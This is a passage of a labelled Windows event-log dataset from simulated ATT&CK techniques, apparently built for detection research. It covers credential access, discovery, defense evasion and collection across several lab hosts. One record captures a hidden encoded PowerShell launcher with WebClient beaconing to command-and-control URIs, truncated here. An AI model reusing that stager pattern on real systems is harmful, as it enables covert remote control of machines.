{e2c04bb9-08c5-60c4-7909-000000000300} ProcessId: 6472 Image: C:\Users\APT-Simulator\Documents\APTSimulator-master\helpers\7z.exe TargetFilename: C:\TMP\CreateNamedPipe.exe CreationUtcTime: 2021-06-11 21:07:26.806 || 11. A process has exited. Subject: Security ID: S-1-5-21-315269454-3320600716-4144796452-500 Account Name: APT-Simulator Account Domain: WORKSTATION5 Logon ID: 0x3719FB Process Information: Process ID: 0x1948 Process Name: C:\Users\APT-Simulator\Documents\APTSimulator-master\helpers\7z.exe Exit Status: 0x0 || 12. File created: RuleName: - UtcTime: 2021-06-12 01:07:17.868 ProcessGuid: {e2c04bb9-a3ee-60c3-5100-000000000300} ProcessId: 2288 Image: C:\Windows\system32\svchost.exe TargetFilename: C:\Windows\Prefetch\7Z.EXE-F100D1AB.pf CreationUtcTime: 2021-06-11 20:54:48.587
85
OTRF-Security-Datasets-atomic
windows
WORKSTATION5.theshire.local
12
Credential Access
T1003.002
2020-09-22T11:11:35.426000+03:00
2020-09-22T11:28:42.564000+03:00
1. "C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe" /onlogon || 2. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x1390 Process Information: Process ID: 0x478 Process Name: C:\Windows\System32\svchost.exe || 3. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x4b4 Resource Attributes: - Process Information: Process ID: 0x478 Process Name: C:\Windows\System32\svchost.exe A || 4. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x4b4 Resource Attributes: - Process Information: Process ID: 0x478 Process Name: C:\Windows\System32\svchost.e || 5. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x4b4 Process Information: Process ID: 0x478 Process Name: C:\Windows\System32\svchost.exe || 6. "C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe" /onlogon || 7. The handle to an object was closed. Subject : Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x10AC67 Object: Object Server: Security Handle ID: 0x1390 Process Information: Process ID: 0x6e8 Process Name: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe || 8. A handle to an object was requested. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x10AC67 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0xd0 Resource Attributes: - Process Information: Process ID: 0x6e8 Process Name: C:\Program Files (x86) || 9. An attempt was made to access an object. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x10AC67 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0xd0 Resource Attributes: - Process Information: Process ID: 0x6e8 Process Name: C:\Program Files ( || 10. The handle to an object was closed. Subject : Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x10AC67 Object: Object Server: Security Handle ID: 0xd0 Process Information: Process ID: 0x6e8 Process Name: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe || 11. The handle to an object was closed. Subject : Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x10AC67 Object: Object Server: Security Handle ID: 0x21e8 Process Information: Process ID: 0xbf8 Process Name: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe || 12. A handle to an object was requested. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x10AC67 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0xb14 Resource Attributes: - Process Information: Process ID: 0xbf8 Process Nam
86
OTRF-Security-Datasets-atomic
windows
WORKSTATION6.theshire.local
12
Execution
T1021
2020-09-20T19:16:10.376000+03:00
2020-09-20T19:18:21.465000+03:00
1. A process has exited. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1106 Account Name: sbeavers Account Domain: THESHIRE Logon ID: 0x252C1B7 Process Information: Process ID: 0x2594 Process Name: C:\Windows\System32\RuntimeBroker.exe Exit Status: 0x0 || 2. A process has exited. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Process Information: Process ID: 0x2150 Process Name: C:\Windows\System32\svchost.exe Exit Status: 0x0 || 3. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2d84 Process Information: Process ID: 0x4a0 Process Name: C:\Windows\System32\svchost.exe || 4. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x43c Resource Attributes: - Process Information: Process ID: 0x4a0 Process Name: C:\Windows\System32\svchost.exe A || 5. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x43c Resource Attributes: - Process Information: Process ID: 0x4a0 Process Name: C:\Windows\System32\svchost.e || 6. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x43c Process Information: Process ID: 0x4a0 Process Name: C:\Windows\System32\svchost.exe || 7. "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe" /frequentupdate SCHEDULEDTASK displaylevel=False || 8. "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe" /frequentupdate SCHEDULEDTASK displaylevel=False || 9. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x33b8 Process Information: Process ID: 0xfec Process Name: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe || 10. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0xb4 Resource Attributes: - Process Information: Process ID: 0xfec Process Name: C:\Program Files\Common Files\microsoft shared\ClickToRun\ || 11. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0xb4 Resource Attributes: - Process Information: Process ID: 0xfec Process Name: C:\Program Files\Common Files\microsoft shared\ClickTo || 12. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0xb4 Process Information: Process ID: 0xfec Process Name: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
87
OTRF-Security-Datasets-atomic
windows
WORKSTATION6.mordor.local
12
Collection
T1123
2020-06-10T05:50:56.539000+03:00
2020-06-10T05:52:49.859000+03:00
1. RawAccessRead detected: RuleName: - UtcTime: 2020-06-10 02:50:54.647 ProcessGuid: {6a910b9d-498a-5ee0-c903-000000000400} ProcessId: 6196 Image: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Device: \Device\HarddiskVolume1 || 2. RawAccessRead detected: RuleName: - UtcTime: 2020-06-10 02:50:54.647 ProcessGuid: {6a910b9d-498a-5ee0-c903-000000000400} ProcessId: 6196 Image: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Device: \Device\HarddiskVolume1 || 3. "C:\windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca || 4. "C:\windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca || 5. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x3c1c Process Information: Process ID: 0x368 Process Name: C:\Windows\System32\svchost.exe || 6. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x1714 Resource Attributes: - Process Information: Process ID: 0x368 Process Name: C:\Windows\System32\svchost.exe Ac || 7. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x1714 Resource Attributes: - Process Information: Process ID: 0x368 Process Name: C:\Windows\System32\svchost.ex || 8. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x1714 Process Information: Process ID: 0x368 Process Name: C:\Windows\System32\svchost.exe || 9. "C:\windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca || 10. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x3afc Process Information: Process ID: 0x368 Process Name: C:\Windows\System32\svchost.exe || 11. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x1738 Resource Attributes: - Process Information: Process ID: 0x368 Process Name: C:\Windows\System32\svchost.exe Ac || 12. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION6$ Account Domain: MORDOR Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x1738 Resource Attributes: - Process Information: Process ID: 0x368 Process Name: C:\Windows\System32\svchost.ex
88
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Credential Access
T1003.006
2020-08-05T09:09:31.637000+03:00
2020-09-22T01:59:50.326000+03:00
1. File created: RuleName: - UtcTime: 2020-08-05 06:09:29.965 ProcessGuid: {2b437147-0bb1-5f2a-2300-000000000400} ProcessId: 1660 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive1.dat CreationUtcTime: 2020-08-05 01:31:26.143 || 2. RawAccessRead detected: RuleName: - UtcTime: 2020-08-05 06:09:49.849 ProcessGuid: {2b437147-0bab-5f2a-0c00-000000000400} ProcessId: 704 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 3. RawAccessRead detected: RuleName: - UtcTime: 2020-08-05 06:09:49.849 ProcessGuid: {2b437147-0bab-5f2a-0c00-000000000400} ProcessId: 704 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 4. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Delegation New Logon: Security ID: S-1-5-21-3669966080-2286457517-972388166-1111 Account Name: WEC$ Account Domain: THESHIRE.LOCAL Logon ID: 0x824281 Linked Logon I || 5. Network connection detected: RuleName: - UtcTime: 2020-08-05 06:09:48.521 ProcessGuid: {2b437147-0ba4-5f2a-0100-000000000400} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: false SourceIp: 172.18.38.6 SourceHostname: - SourcePort: 54639 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.38.5 DestinationHostname: - DestinationPort: 44 || 6. Network connection detected: RuleName: - UtcTime: 2020-08-05 06:09:49.321 ProcessGuid: {2b437147-0bbd-5f2a-4e00-000000000400} ProcessId: 3588 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: true SourceIsIpv6: false SourceIp: 172.18.38.5 SourceHostname: - SourcePort: 61117 SourcePortName: - DestinationIsIpv6: false DestinationIp: 64.4.48.201 DestinationHostname || 7. An account was logged off. Subject: Security ID: S-1-5-21-3669966080-2286457517-972388166-1111 Account Name: WEC$ Account Domain: THESHIRE Logon ID: 0x824281 Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 8. A Kerberos service ticket was requested. Account Information: Account Name: pgustavo@THESHIRE.LOCAL Account Domain: THESHIRE.LOCAL Logon GUID: {f6d1cc3a-512e-e489-ae9e-8b993f455d88} Service Information: Service Name: MORDORDC$ Service ID: S-1-5-21-3669966080-2286457517-972388166-1000 Network Information: Client Address: ::ffff:172.18.39.5 Client Port: 59697 Additional Information: Ticket Options: || 9. Special privileges assigned to new logon. Subject: Security ID: S-1-5-21-3669966080-2286457517-972388166-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x824909 Privileges: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivil || 10. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Identification New Logon: Security ID: S-1-5-21-3669966080-2286457517-972388166-1104 Account Name: pgustavo Account Domain: THESHIRE.LOCAL Logon ID: 0x824909 Linked || 11. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x1620 Process Information: Process ID: 0x2c0 Process Name: C:\Windows\System32\lsass.exe || 12. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0xfa8 Resource Attributes: - Process Information: Process ID: 0x2c0 Process Name: C:\Windows\System32\lsass.exe Access Request Information: Tra
89
OTRF-Security-Datasets-atomic
windows
IT001.shire.com
12
Defense Evasion
T1112
2019-12-25T07:52:02.809000+03:00
2019-12-25T07:53:54.982000+03:00
1. CommandInvocation(ForEach-Object): "ForEach-Object" ParameterBinding(ForEach-Object): name="Process"; value="$e6cc5.Headers.Add($_.Name, $_.Value)" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHI || 2. CommandInvocation(Get-Random): "Get-Random" ParameterBinding(Get-Random): name="InputObject"; value="/admin/get.php" ParameterBinding(Get-Random): name="InputObject"; value="/news.php" ParameterBinding(Get-Random): name="InputObject"; value="/login/process.php" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host A || 3. Network connection detected: RuleName: UtcTime: 2019-12-25 04:51:59.196 ProcessGuid: {a158f72c-e9e0-5e02-0000-00104038e100} ProcessId: 716 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User: shire\pgustavo Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 172.18.39.105 SourceHostname: IT001.shire.com SourcePort: 54838 SourcePortName: DestinationIsIpv6: false Destinatio || 4. CommandInvocation(Start-Sleep): "Start-Sleep" ParameterBinding(Start-Sleep): name="Seconds"; value="5" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAUwBJAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBFAHIAUwBJ || 5. CommandInvocation(Get-Random): "Get-Random" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAUwBJAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBFAHIAUwBJAG8AbgAuAE0AQQBKAE8AUgAgAC0AZwBFACAAMwApAHsAJABiAGUAMgBlADM || 6. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Net.WebClient" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAUwBJAG8AbgBUAGEAYgBsAGUALgB || 7. CommandInvocation(ForEach-Object): "ForEach-Object" ParameterBinding(ForEach-Object): name="Process"; value="$e6cc5.Headers.Add($_.Name, $_.Value)" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHI || 8. CommandInvocation(Get-Random): "Get-Random" ParameterBinding(Get-Random): name="InputObject"; value="/admin/get.php" ParameterBinding(Get-Random): name="InputObject"; value="/news.php" ParameterBinding(Get-Random): name="InputObject"; value="/login/process.php" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host A || 9. Network connection detected: RuleName: UtcTime: 2019-12-25 04:52:04.275 ProcessGuid: {a158f72c-e9e0-5e02-0000-00104038e100} ProcessId: 716 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User: shire\pgustavo Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 172.18.39.105 SourceHostname: IT001.shire.com SourcePort: 54839 SourcePortName: DestinationIsIpv6: false Destinatio || 10. CommandInvocation(Start-Sleep): "Start-Sleep" ParameterBinding(Start-Sleep): name="Seconds"; value="5" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAUwBJAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBFAHIAUwBJ || 11. CommandInvocation(Get-Random): "Get-Random" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAUwBJAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBFAHIAUwBJAG8AbgAuAE0AQQBKAE8AUgAgAC0AZwBFACAAMwApAHsAJABiAGUAMgBlADM || 12. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Net.WebClient" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 2b2253ea-a6b8-48cb-8e71-a62708985acd Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAUwBJAG8AbgBUAGEAYgBsAGUALgB
90
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Defense Evasion
T1222.001
2020-09-21T20:09:45.490000+03:00
2020-09-21T20:12:55.823000+03:00
1. Special privileges assigned to new logon. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x6375461 Privileges: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege || 2. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE.LOCAL Logon ID: 0x6375461 Linked Logon ID: 0x0 Network Account Name: || 3. An account was logged off. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x6375461 Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 4. An account was logged off. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1111 Account Name: WEC$ Account Domain: THESHIRE Logon ID: 0x637535F Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 5. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1112 Account Name: WORKSTATION5$ Account Domain: THESHIRE.LOCAL Logon ID: 0x637558F || 6. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1112 Account Name: WORKSTATION5$ Account Domain: THESHIRE.LOCAL Logon ID: 0x63755AA || 7. A Kerberos service ticket was requested. Account Information: Account Name: WORKSTATION5$@THESHIRE.LOCAL Account Domain: THESHIRE.LOCAL Logon GUID: {ae4e5a93-c29b-d7dd-37da-05e5094fb35d} Service Information: Service Name: WORKSTATION5$ Service ID: S-1-5-21-4228717743-1032521047-1810997296-1112 Network Information: Client Address: ::ffff:172.18.39.5 Client Port: 56157 Additional Information: Ticket || 8. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1112 Account Name: WORKSTATION5$ Account Domain: THESHIRE.LOCAL Logon ID: 0x63755C0 || 9. A Kerberos service ticket was requested. Account Information: Account Name: WORKSTATION5$@THESHIRE.LOCAL Account Domain: THESHIRE.LOCAL Logon GUID: {f1536580-be5d-9b79-1a6f-4bf3a1c980a8} Service Information: Service Name: MORDORDC$ Service ID: S-1-5-21-4228717743-1032521047-1810997296-1000 Network Information: Client Address: ::ffff:172.18.39.5 Client Port: 56160 Additional Information: Ticket Opt || 10. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Delegation New Logon: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1112 Account Name: WORKSTATION5$ Account Domain: THESHIRE.LOCAL Logon ID: 0x63755ED Lin || 11. An account was logged off. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1112 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x63755C0 Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 12. An account was logged off. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1112 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x63755AA Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
91
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Discovery
T1069.002
2020-09-21T11:08:50.722000+03:00
2020-09-22T21:11:02.391000+03:00
1. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2af0 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 2. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x2c8 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Access R || 3. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x2c8 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Acce || 4. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2c8 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 5. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2298 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 6. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x4a0 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Access R || 7. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x4a0 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Acce || 8. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x4a0 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 9. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x229c Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 10. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x2c8 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Access R || 11. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 